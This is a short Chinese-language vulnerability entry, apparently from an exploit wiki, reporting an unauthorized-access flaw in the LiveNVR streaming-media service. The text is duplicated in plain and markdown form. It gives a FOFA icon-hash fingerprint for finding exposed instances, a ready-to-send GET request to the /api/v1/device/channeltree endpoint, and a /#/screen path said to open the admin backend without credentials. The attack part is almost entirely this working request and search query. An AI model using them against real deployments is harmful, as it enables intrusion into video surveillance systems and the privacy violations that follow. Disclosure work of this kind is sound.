fofamini-wiki

登录白背景

源码

LiveNVR流媒体服务软件接口存在未授权访问漏洞

一、漏洞简介

二、影响版本

LiveNVR流媒体服务

三、资产测绘

icon_hash="-206100324"

四、漏洞复现

GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache

/#/screen

直接进入后台

原文: https://www.yuque.com/xiaokp7/ocvun2/axykbyt4pcw7ilox

# LiveNVR流媒体服务软件接口存在未授权访问漏洞

# 一、漏洞简介
LiveNVR流媒体服务软件接口存在未授权访问漏洞

# 二、影响版本
+ LiveNVR流媒体服务

# 三、资产测绘
```plain
icon_hash="-206100324"
```

![1721578942593-458e48bc-f549-4677-b069-c9f5c0a09e11.png](./img/gc4vd1ygMW0EneES/1721578942593-458e48bc-f549-4677-b069-c9f5c0a09e11-201122.png)

# 四、漏洞复现
```plain
GET /api/v1/device/channeltree?serial=&pcode HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Cache-Control: no-cache
```

![1721578812838-82ea05f2-a98f-4389-8005-431d8c19ac72.png](./img/gc4vd1ygMW0EneES/1721578812838-82ea05f2-a98f-4389-8005-431d8c19ac72-677203.png)

```plain
/#/screen
```

直接进入后台

![1721578895702-ccb5d24a-7db7-4ff0-b378-340ca1efe5b8.png](./img/gc4vd1ygMW0EneES/1721578895702-ccb5d24a-7db7-4ff0-b378-340ca1efe5b8-072314.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/axykbyt4pcw7ilox>